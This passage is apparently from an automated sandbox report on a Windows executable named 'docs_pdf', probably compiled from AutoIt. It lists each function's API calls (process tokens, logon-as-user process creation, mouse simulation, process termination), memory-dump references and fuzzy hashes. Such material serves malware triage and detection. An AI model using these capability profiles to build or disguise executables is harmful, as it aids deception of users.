                                    • _memset.LIBCMT ref: 01012747
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01012792
                                    • IsMenu.USER32(00000000), ref: 010127B2
                                    • CreatePopupMenu.USER32 ref: 010127E6
                                    • GetMenuItemCount.USER32(000000FF), ref: 01012844
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01012875
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 14fc9beae39f92987f9d9a7ae8159f47c58a4d8d929db60dbc6e525ede5157d2
                                    • Instruction ID: bf37e04d2edb21c7ed3d6424df1f4a4b65f1aa33b8de57daad4894e87c86da1e
                                    • Opcode Fuzzy Hash: 14fc9beae39f92987f9d9a7ae8159f47c58a4d8d929db60dbc6e525ede5157d2
                                    • Instruction Fuzzy Hash: 3551B170A01306DFDF25CF68D888BAEBBF5BF44314F204199F9919B299D7788944CB51
                                    Function 00FB1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FB179A
                                    • GetWindowRect.USER32(?,?), ref: 00FB17FE
                                    • ScreenToClient.USER32(?,?), ref: 00FB181B
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FB182C
                                    • EndPaint.USER32(?,?), ref: 00FB1876
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                    • String ID:
                                    • API String ID: 1827037458-0
                                    • Opcode ID: aaa92ed18eb2d759e8407db611ed168e068a2a58d19730bb580854b372dca60d
                                    • Instruction ID: 2953da7692dbaa9c459828f7cf3aa197c01a34264e680add439c22e86bb428e3
                                    • Opcode Fuzzy Hash: aaa92ed18eb2d759e8407db611ed168e068a2a58d19730bb580854b372dca60d
                                    • Instruction Fuzzy Hash: DA41D071900301AFD720DF26C894FBB7BE8FB4A724F140629F9A5871A1C7369845EB62
                                    Function 0103B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(010767B0,00000000,00B95080,?,?,010767B0,?,0103B862,?,?), ref: 0103B9CC
                                    • EnableWindow.USER32(00000000,00000000), ref: 0103B9F0
                                    • ShowWindow.USER32(010767B0,00000000,00B95080,?,?,010767B0,?,0103B862,?,?), ref: 0103BA50
                                    • ShowWindow.USER32(00000000,00000004,?,0103B862,?,?), ref: 0103BA62
                                    • EnableWindow.USER32(00000000,00000001), ref: 0103BA86
                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0103BAA9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: b3c7194be6b6a38fd060538940304d103bb9c8fc20438ade12dca838798e9ffc
                                    • Instruction ID: f82c3b9acfb8463bc4de929e4ad2297d891296325239c085f6e10888179e86f4
                                    • Opcode Fuzzy Hash: b3c7194be6b6a38fd060538940304d103bb9c8fc20438ade12dca838798e9ffc
                                    • Instruction Fuzzy Hash: 0A416630600541AFDB62CF18C489BA57FE8FF45319F1841E9FA88CF2A6C7319446CB51
                                    Function 010273B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,01025134,?,?,00000000,00000001), ref: 010273BF
                                      • Part of subcall function 01023C94: GetWindowRect.USER32(?,?), ref: 01023CA7
                                    • GetDesktopWindow.USER32 ref: 010273E9
                                    • GetWindowRect.USER32(00000000), ref: 010273F0
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 01027422
                                      • Part of subcall function 010154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
                                    • GetCursorPos.USER32(?), ref: 0102744E
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010274AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 6905ab544fa7de6ab804f3f2e962cf3cda95aa9a8fbaeb5a3a0e3737a5604a4c
                                    • Instruction ID: d497da14e220d373d858eb4216cb2a9b40f0b7e9bbc49bd2866675daea748a06
                                    • Opcode Fuzzy Hash: 6905ab544fa7de6ab804f3f2e962cf3cda95aa9a8fbaeb5a3a0e3737a5604a4c
                                    • Instruction Fuzzy Hash: 9931CF72604316ABD720DF68D848F9BBBE9FF99314F00091AF5C997181CB75E908CB92
                                    Function 01008D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 010085F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01008608
                                      • Part of subcall function 010085F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01008612
                                      • Part of subcall function 010085F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01008621
                                      • Part of subcall function 010085F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01008628
                                      • Part of subcall function 010085F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0100863E
                                    • GetLengthSid.ADVAPI32(?,00000000,01008977), ref: 01008DAC
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01008DB8
                                    • HeapAlloc.KERNEL32(00000000), ref: 01008DBF
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 01008DD8
                                    • GetProcessHeap.KERNEL32(00000000,00000000,01008977), ref: 01008DEC
                                    • HeapFree.KERNEL32(00000000), ref: 01008DF3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 3008561057-0
                                    • Opcode ID: f3744fed194ea8adbaa51dccb4a4c91a4a9cd25c0936b6cd809ee23628fbe22d
                                    • Instruction ID: fb389315f4689fafb6413b5da19af353f44ec6b8264bcb8f69811f7b3b047369
                                    • Opcode Fuzzy Hash: f3744fed194ea8adbaa51dccb4a4c91a4a9cd25c0936b6cd809ee23628fbe22d
                                    • Instruction Fuzzy Hash: C411CA31900606EBEB61ABA8DC08BAE7BA9FB51215F10825AE9C597240C7369904DB60
                                    Function 01008AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 01008B2A
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 01008B31
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01008B40
                                    • CloseHandle.KERNEL32(00000004), ref: 01008B4B
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01008B7A
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 01008B8E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: a41504f3c6c47a19f4a2b7c5643a5974e62be5e91b35924c6a2dab39139cd0da
                                    • Instruction ID: f25f9f5f5cf04889ae287def3dcb391098f2aee61bed27fd984325c46c5cfda6
                                    • Opcode Fuzzy Hash: a41504f3c6c47a19f4a2b7c5643a5974e62be5e91b35924c6a2dab39139cd0da
                                    • Instruction Fuzzy Hash: D1111DB290120AEBEF128F98DD49FDA7BADFB05304F044055FA44A2190C3769D659B61
                                    Function 0103C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB134D
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB135C
                                      • Part of subcall function 00FB12F3: BeginPath.GDI32(?), ref: 00FB1373
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB139C
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0103C1C4
                                    • LineTo.GDI32(00000000,00000003,?), ref: 0103C1D8
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0103C1E6
                                    • LineTo.GDI32(00000000,00000000,?), ref: 0103C1F6
                                    • EndPath.GDI32(00000000), ref: 0103C206
                                    • StrokePath.GDI32(00000000), ref: 0103C216
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 1142ac653c1e1fe23a58effb28017cd72a29c5d060073b696e83270ea5233752
                                    • Instruction ID: ed68200205491d6dee1f15bfa032ddd4172039a4af53f7bfdd9c6360521959b2
                                    • Opcode Fuzzy Hash: 1142ac653c1e1fe23a58effb28017cd72a29c5d060073b696e83270ea5233752
                                    • Instruction Fuzzy Hash: E7115B7680010DBFEF219F94DC88EEA7FACEB08350F048011BA499A165C7769E94DFA0
                                    Function 00FD03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD03D3
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD03DB
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD03E6
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD03F1
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD03F9
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD0401
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: efcba155b8a19b6cbe53d40afd89f2e6bacbda3e3aed3ee255b774100e5cbe26
                                    • Instruction ID: ea7c4e2322a1f9d0a78ed4bbe6f9f7709495293b4c4aa79e4df4cbf8f70a8db8
                                    • Opcode Fuzzy Hash: efcba155b8a19b6cbe53d40afd89f2e6bacbda3e3aed3ee255b774100e5cbe26
                                    • Instruction Fuzzy Hash: 770148B090175A7DE3008F6A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
                                    Function 0101568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0101569B
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 010156B1
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 010156C0
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010156CF
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010156D9
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010156E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 29d4252d88a5d3af92083f452acef37240a8ee25bf0da557b7feea4027297f9a
                                    • Instruction ID: ef2a190f11b0bde8784af64bc1be69146eca54952ee070804284f556608b5609
                                    • Opcode Fuzzy Hash: 29d4252d88a5d3af92083f452acef37240a8ee25bf0da557b7feea4027297f9a
                                    • Instruction Fuzzy Hash: C9F09631541119BBD3315A62EC0DEEF7B7CEFCBB11F000159F944D1040D7A61A0197B6
                                    Function 010174D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 010174E5
                                    • EnterCriticalSection.KERNEL32(?,?,00FC1044,?,?), ref: 010174F6
                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00FC1044,?,?), ref: 01017503
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FC1044,?,?), ref: 01017510
                                      • Part of subcall function 01016ED7: CloseHandle.KERNEL32(00000000,?,0101751D,?,00FC1044,?,?), ref: 01016EE1
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01017523
                                    • LeaveCriticalSection.KERNEL32(?,?,00FC1044,?,?), ref: 0101752A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 79a06b2b1bc781826f7c166447d0beb8defe4ce04f9e7cf6d75f6922d3fffa6d
                                    • Instruction ID: 909184b586c90f7e0d24cd55f67b6629487f0466e6806a5411e56d4475419471
                                    • Opcode Fuzzy Hash: 79a06b2b1bc781826f7c166447d0beb8defe4ce04f9e7cf6d75f6922d3fffa6d
                                    • Instruction Fuzzy Hash: 0CF05E3A940613EBEB212B64FD8CDEB7B7EFF45302B000561F682910A9CBBA5405CB51
                                    Function 01008E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01008E7F
                                    • UnloadUserProfile.USERENV(?,?), ref: 01008E8B
                                    • CloseHandle.KERNEL32(?), ref: 01008E94
                                    • CloseHandle.KERNEL32(?), ref: 01008E9C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 01008EA5
                                    • HeapFree.KERNEL32(00000000), ref: 01008EAC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                    • String ID:
                                    • API String ID: 146765662-0
                                    • Opcode ID: 9f2029f0fe24c01d6e29052c75aa70eb300beab489baa133cbdf4c3d05e6552e
                                    • Instruction ID: 8306b89ae532cb669aa804d0df6781cd671ab3e5abf8dd786ff8f165a4e33fee
                                    • Opcode Fuzzy Hash: 9f2029f0fe24c01d6e29052c75aa70eb300beab489baa133cbdf4c3d05e6552e
                                    • Instruction Fuzzy Hash: 80E0E536404002BBDB112FE2EC0CD0ABF7DFF8A322B108220F259C1068CB3B9424DB52
                                    Function 01028902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 01028928
                                    • CharUpperBuffW.USER32(?,?), ref: 01028A37
                                    • VariantClear.OLEAUT32(?), ref: 01028BAF
                                      • Part of subcall function 01017804: VariantInit.OLEAUT32(00000000), ref: 01017844
                                      • Part of subcall function 01017804: VariantCopy.OLEAUT32(00000000,?), ref: 0101784D
                                      • Part of subcall function 01017804: VariantClear.OLEAUT32(00000000), ref: 01017859
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: d5480eb75fa975f6f508672d4e8c5f1c8b8606a6b0d0e16e2390eecbca6ede64
                                    • Instruction ID: 5fbe2ebe0d704e6a957577ef0f2600630f00381d4cc2a0c62c34d97d6209cc95
                                    • Opcode Fuzzy Hash: d5480eb75fa975f6f508672d4e8c5f1c8b8606a6b0d0e16e2390eecbca6ede64
                                    • Instruction Fuzzy Hash: 96917F75608301DFC710EF29C88499ABBF8EF89714F04895EF99A8B361DB35E905CB52
                                    Function 01012F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                    • _memset.LIBCMT ref: 01013077
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 010130A6
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01013159
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01013187
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: ccb0fb8962a53344e7c46ee2357c3d6a947b71d65789c4e1eb46b43344055157
                                    • Instruction ID: 8706ffca6da90fdef22e7de2f4ad55367dddc3f91e125a9a07972dfea9decdae
                                    • Opcode Fuzzy Hash: ccb0fb8962a53344e7c46ee2357c3d6a947b71d65789c4e1eb46b43344055157
                                    • Instruction Fuzzy Hash: FD51E3316083009BE765AF28C844B6BBBF4FF44330F040A6DF9C59A295DB79C9448B52
                                    Function 0100DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0100DAC5
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0100DAFB
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0100DB0C
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0100DB8E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 1417d149fe3278999269f4288e766fdb74b90a14cdc76631090fa5917133be6b
                                    • Instruction ID: acab6a3ce49dfef55fc2fb54d5ea13617549e9111071a56b8706d7cc0bd819cf
                                    • Opcode Fuzzy Hash: 1417d149fe3278999269f4288e766fdb74b90a14cdc76631090fa5917133be6b
                                    • Instruction Fuzzy Hash: C3418FB1600609EFEB16CFD5C884A9ABBF9EF44310F0480A9EE459F285D7B1D940DBB0
                                    Function 01012C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 01012CAF
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 01012CCB
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 01012D11
